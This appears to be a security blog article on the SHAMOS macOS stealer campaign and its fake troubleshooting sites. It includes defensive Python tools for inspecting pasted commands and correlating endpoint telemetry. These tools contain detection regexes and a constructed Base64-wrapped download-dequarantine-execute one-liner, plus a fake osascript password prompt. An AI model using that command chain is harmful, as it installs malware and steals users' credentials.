Between June and August 2025, CrowdStrike researchers tracked a malware campaign targeting macOS users worldwide. The campaign attempted to compromise more than 300 customer environments, relying on deceptive tactics that exploit users’ trust in everyday troubleshooting resources rather than on any flaw in macOS itself.

At the center of this operation is SHAMOS, a dangerous variant of the notorious Atomic macOS Stealer (AMOS). SHAMOS is deployed by the cybercriminal group COOKIE SPIDER, which operates the malware as a service, renting it to other threat actors. This structure allows a wide range of cybercriminals to use SHAMOS without needing to develop their own malware, significantly increasing the reach and impact of the attacks.

New macOS Malware Campaign Targets Users with Deceptive Help Websites

How the Attack Works

The campaign begins in a surprisingly simple way: users searching for help online. For example, a user may search for a routine macOS troubleshooting command such as “macOS flush resolver cache” in hopes of resolving a network issue. Paid search advertisements (malvertising) place attacker-controlled sites at the top of those results, and the user lands on a page built specifically to distribute SHAMOS.

Websites involved in the campaign, including mac-safer.com and rescue-mac.com, appear legitimate at first glance. They present themselves as technical support resources, offering step-by-step instructions to resolve macOS issues. However, this is a classic case of social engineering, where attackers manipulate users into taking actions that compromise their own systems.

In this scenario, users are told to paste a single command into Terminal. It looks like a routine fix, but it fetches an installer script that downloads the SHAMOS binary and runs it, a pattern now commonly called ClickFix. Once running, the stealer harvests sensitive information, potentially giving attackers access to personal credentials, financial data, and other confidential files stored on the system.

The Global Reach of the Campaign

The SHAMOS campaign has not been limited to a single country. CrowdStrike researchers report that it has targeted users in the United States, United Kingdom, Japan, China, Colombia, Canada, Mexico, and Italy. Interestingly, Russia has been deliberately excluded. This exclusion stems from rules within Russian eCrime forums that prohibit attacks targeting Commonwealth of Independent States (CIS) regions, showing that even cybercriminal networks sometimes operate with regional restrictions.

This broad geographic scope highlights the campaign’s potential impact. Organizations and individual users alike face increased risk, particularly those who regularly seek online help for technical issues without verifying the credibility of the websites they visit.

The Role of Social Engineering

What makes this campaign particularly dangerous is that it needs no vulnerability in macOS at all. The attackers manipulate users directly: by offering a fix that looks helpful and technically plausible, they create a false sense of trust, and the victim performs the installation for them.

Users are presented with instructions that appear to solve their problem, yet those instructions conceal the real payload. Gatekeeper and the quarantine attribute protect files that a browser downloaded; a command pasted into Terminal fetches the binary with curl, which sets no quarantine attribute, or removes the attribute explicitly, so the binary runs without the warning a user would see when opening an unsigned download. If the installer needs a password, the victim types it into a prompt the script displays. This tactic emphasizes the importance of skepticism and verification when following online troubleshooting guides, especially from unfamiliar sources.
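The one practical check both sections above lead to is reading a pasted one-liner before running it. The inspector below is an added example, not code from the page, from CrowdStrike, or from the campaign: it decodes any Base64 blobs hidden in a command, scans every decoded layer for the behaviours described above (download piped into a shell, quarantine attribute stripped, AppleScript password prompt, persistence), and returns a verdict. The sample commands are constructed; the host, path and file names in the malicious sample are made up, and the two benign samples are ordinary macOS networking commands.

```python
"""Dry-run inspector for a "paste this into Terminal" one-liner (added example)."""
import base64
import re

# Behaviours that should stop the user outright. Each entry is (regex, reason).
HIGH = [
    (r"\bcurl\b[^|;&]*\|\s*(?:ba|z)?sh\b", "download piped straight into a shell"),
    (r"\$\(\s*curl\b|`\s*curl\b", "shell executes whatever curl returns"),
    (r"\bbase64\s+(?:-d|--decode|-D)\b\s*\|\s*(?:ba|z)?sh\b", "hidden Base64 payload piped into a shell"),
    (r"\bxattr\s+(?:-c|-d\s+com\.apple\.quarantine)\b", "strips the quarantine attribute Gatekeeper checks"),
    (r"\bosascript\b.*?hidden answer", "AppleScript password prompt, the usual credential grab"),
    (r"\blaunchctl\s+(?:load|bootstrap)\b|LaunchAgents|LaunchDaemons", "installs persistence"),
]
# Behaviours that are legitimate in real fixes but worth a second look.
NOTE = [
    (r"\b(?:curl|wget)\b", "downloads something from the internet"),
    (r"\bchmod\s+\+x\b", "marks a file executable"),
    (r"(?:^|\s)(?:/private)?/(?:tmp|var/tmp)/", "stages files in a temp directory"),
    (r"\bsudo\b", "asks for administrator rights"),
]
# Anything that looks like a Base64 blob long enough to hide a command.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_layers(command, max_depth=4):
    """Return the command plus every printable Base64-decoded layer nested inside it."""
    layers = [command]
    frontier = [command]
    for _ in range(max_depth):
        found = []
        for text in frontier:
            for blob in B64_BLOB.findall(text):
                try:
                    decoded = base64.b64decode(blob, validate=True).decode("utf-8")
                except ValueError:  # not valid Base64, or not text once decoded
                    continue
                if decoded and all(c.isprintable() or c.isspace() for c in decoded) \
                        and decoded not in layers:
                    found.append(decoded)
        if not found:
            break
        layers.extend(found)
        frontier = found
    return layers


def inspect(command):
    """Return (layer_depth, severity, reason) for every rule that fires on any layer."""
    findings = []
    for depth, layer in enumerate(decode_layers(command)):
        for severity, rules in (("high", HIGH), ("note", NOTE)):
            for pattern, reason in rules:
                if re.search(pattern, layer, re.IGNORECASE | re.DOTALL):
                    findings.append((depth, severity, reason))
    return findings


def verdict(command):
    """'refuse' on any high-severity hit, 'review' on notes only, else 'looks benign'."""
    findings = inspect(command)
    if any(sev == "high" for _, sev, _ in findings):
        return "refuse"
    return "review" if findings else "looks benign"


# Constructed samples. The malicious one mimics the shape of the campaign's
# one-liner (Base64 -> shell -> curl -> xattr -> run); host and paths are invented.
BENIGN_FLUSH = "sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder"
BENIGN_PLAIN = "networksetup -listallhardwareports"
_INNER = ("curl -fsSL https://update.example.invalid/Update -o /tmp/Update && "
          "xattr -c /tmp/Update && chmod +x /tmp/Update && /tmp/Update")
MALICIOUS = 'echo "%s" | base64 -d | bash' % base64.b64encode(_INNER.encode()).decode()

if __name__ == "__main__":
    for cmd in (BENIGN_PLAIN, BENIGN_FLUSH, MALICIOUS):
        print(verdict(cmd))
        for depth, sev, reason in inspect(cmd):
            print(f"  layer {depth} [{sev}] {reason}")
```

The legitimate DNS-cache fix comes back as "review" only because it uses sudo; the constructed installer is refused on the outer layer (Base64 into bash) before the inner layer is even considered, and the inner layer adds the quarantine strip. Treat the rules as a starting point: a real site can split the chain across several pasted commands, so the check is on behaviour, not on any particular host name.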

Understanding SHAMOS and AMOS

SHAMOS is a variant of Atomic macOS Stealer (AMOS), a well-known malware family designed to target macOS users. AMOS itself has been recognized for its ability to extract sensitive information from infected systems, including login credentials, browser-stored passwords, and potentially even cryptocurrency wallets.

By creating SHAMOS, COOKIE SPIDER has enhanced the capabilities of AMOS while making it available for rent through a malware-as-a-service (MaaS) model. This means that even cybercriminals with limited technical expertise can launch targeted attacks by simply purchasing or renting access to SHAMOS. Such models have become increasingly common in cybercrime, as they lower the barrier to entry and expand the range of potential victims.

Mitigation and Prevention

Given the deceptive nature of this campaign, preventing infection requires vigilance from both individual users and organizations. Key steps include:

  1. Verify the Source of Troubleshooting Advice: Do not follow instructions from whichever site happens to rank first, and be especially wary of results marked as ads. Cross-check the fix against official Apple support documentation or a reputable technical community, and note whether the genuine fix even requires a command.

  2. Be Wary of Terminal Commands: Read a pasted command before running it. A long Base64 string, curl or wget piped into sh or bash, xattr removing the quarantine attribute, or an osascript password dialog are stop signs; a legitimate DNS-cache flush needs none of them. If unsure, seek guidance from trusted IT professionals.

  3. Keep macOS Updated: This campaign exploits no unpatched vulnerability, so updates alone will not stop it, but they close the rest of the attack surface and keep built-in protections such as XProtect current.

  4. Implement Endpoint Protection: Endpoint security solutions can detect and block known stealer variants, including SHAMOS, and can flag the behaviour chain itself: a shell under Terminal running curl, then xattr, then a password prompt, then a binary from a temporary directory.

  5. Educate Users: Organizations should train employees to recognize phishing and social engineering, including the “paste this command to fix it” pattern. Awareness is one of the most effective defenses against campaigns that rely on human error.
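Item 4 asks endpoint protection to recognize the chain rather than a specific file. The detector below is an added example of how that correlation can be written over process-creation telemetry; it is not any vendor's rule, and the event schema (ts, pid, ppid, image, cmdline) is an assumption about what an EDR or unified-log collector exports. The events are constructed: one Terminal session runs the install chain with invented host names and paths, a second runs a legitimate cache flush and a lone download, and only the first should alert.

```python
"""Correlate a Terminal session's child processes into the SHAMOS-style install chain (added example)."""
import re
from collections import defaultdict

# Stages of the chain. Each stage alone is common in admin work; together they are not.
STAGES = [
    ("download",     re.compile(r"\b(?:curl|wget)\b")),
    ("dequarantine", re.compile(r"\bxattr\s+(?:-c|-d\s+com\.apple\.quarantine)\b")),
    ("cred_prompt",  re.compile(r"\bosascript\b.*hidden answer", re.IGNORECASE)),
    ("tmp_exec",     re.compile(r"^(?:/private)?/(?:tmp|var/tmp)/\S+")),
]
TERMINAL_APPS = {"Terminal", "iTerm2"}


def session_shell(pid, by_pid):
    """Walk up the parent chain and return the pid of the shell sitting directly under a terminal app."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        parent = by_pid[pid]["ppid"]
        if parent in by_pid and by_pid[parent]["image"] in TERMINAL_APPS:
            return pid
        pid = parent
    return None


def detect(events, window=600):
    """Alert when one session shows dequarantine plus any other stage, or three stages, within `window` seconds."""
    by_pid = {e["pid"]: e for e in events}
    hits = defaultdict(list)  # session shell pid -> [(ts, stage, pid)]
    for e in events:
        shell = session_shell(e["pid"], by_pid)
        if shell is None:
            continue
        for name, rx in STAGES:
            if rx.search(e["cmdline"]):
                hits[shell].append((e["ts"], name, e["pid"]))
    alerts = []
    for shell, seq in hits.items():
        seq.sort()
        for i, (t0, _, _) in enumerate(seq):
            in_window = [h for h in seq[i:] if h[0] - t0 <= window]
            stages = {s for _, s, _ in in_window}
            if ("dequarantine" in stages and len(stages) >= 2) or len(stages) >= 3:
                alerts.append({"session_shell": shell, "stages": sorted(stages),
                               "pids": sorted({p for _, _, p in in_window})})
                break
    return alerts


# Constructed telemetry. pids, hosts and paths are invented.
EVENTS = [
    {"ts": 0,  "pid": 100, "ppid": 1,   "image": "Terminal",  "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"ts": 1,  "pid": 200, "ppid": 100, "image": "zsh",       "cmdline": "-zsh"},
    {"ts": 30, "pid": 201, "ppid": 200, "image": "bash",      "cmdline": "bash"},  # the `| bash` from the pasted one-liner
    {"ts": 30, "pid": 202, "ppid": 200, "image": "curl",      "cmdline": "curl -fsSL https://update.example.invalid/install.sh"},
    {"ts": 31, "pid": 203, "ppid": 201, "image": "curl",      "cmdline": "curl -fsSL https://update.example.invalid/Update -o /tmp/Update"},
    {"ts": 32, "pid": 204, "ppid": 201, "image": "xattr",     "cmdline": "xattr -c /tmp/Update"},
    {"ts": 33, "pid": 205, "ppid": 201, "image": "osascript", "cmdline": "osascript -e 'display dialog \"macOS needs your password\" default answer \"\" with hidden answer'"},
    {"ts": 34, "pid": 206, "ppid": 201, "image": "Update",    "cmdline": "/tmp/Update"},
    # A second, legitimate session: the real cache flush, then an ordinary download.
    {"ts": 0,   "pid": 300, "ppid": 1,   "image": "Terminal", "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"ts": 1,   "pid": 400, "ppid": 300, "image": "zsh",      "cmdline": "-zsh"},
    {"ts": 5,   "pid": 401, "ppid": 400, "image": "sudo",     "cmdline": "sudo dscacheutil -flushcache"},
    {"ts": 900, "pid": 402, "ppid": 400, "image": "curl",     "cmdline": "curl -fsSL https://files.example.invalid/report.csv -o /tmp/report.csv"},
]

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The grouping key is the interactive shell under the terminal app, so the chain is caught even though the pasted command spawns a nested bash and the individual stages come from different child processes. The benign session only ever reaches one stage, so it stays quiet.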

Implications for macOS Security

This campaign highlights an important truth about modern cybersecurity: even systems perceived as secure are not immune to attacks. macOS has traditionally been seen as less targeted than Windows, but malware campaigns like SHAMOS demonstrate that attackers are increasingly focusing on Apple devices.

The SHAMOS campaign also underscores how cybercriminal operations scale. By combining a malware-as-a-service model with simple but effective social engineering, groups like COOKIE SPIDER can reach a global audience while keeping their own infrastructure and identities at arm’s length from the people who actually run the attacks.

For businesses and individuals alike, this serves as a reminder that online safety depends not only on technology but also on informed behavior. Blindly trusting search results, clicking on promoted links, or executing commands without verification can have severe consequences.

Conclusion

The SHAMOS campaign observed between June and August 2025 represents a major threat to macOS users worldwide. By exploiting users’ trust in online help resources, COOKIE SPIDER and its customers have deployed a stealer capable of taking sensitive data and compromising systems across multiple countries.

The campaign is a stark example of the effectiveness of social engineering in modern cybercrime. Users and organizations must remain vigilant, verify sources of technical guidance, and employ comprehensive security measures to reduce the risk of infection. As cybercriminals continue to evolve their tactics, awareness and education remain the most powerful tools for safeguarding digital environments.

In a world where even the simplest online search can become a threat, understanding the methods and motives behind campaigns like SHAMOS is essential. By staying informed, verifying instructions, and implementing robust security practices, macOS users can protect themselves from falling victim to this insidious malware campaign.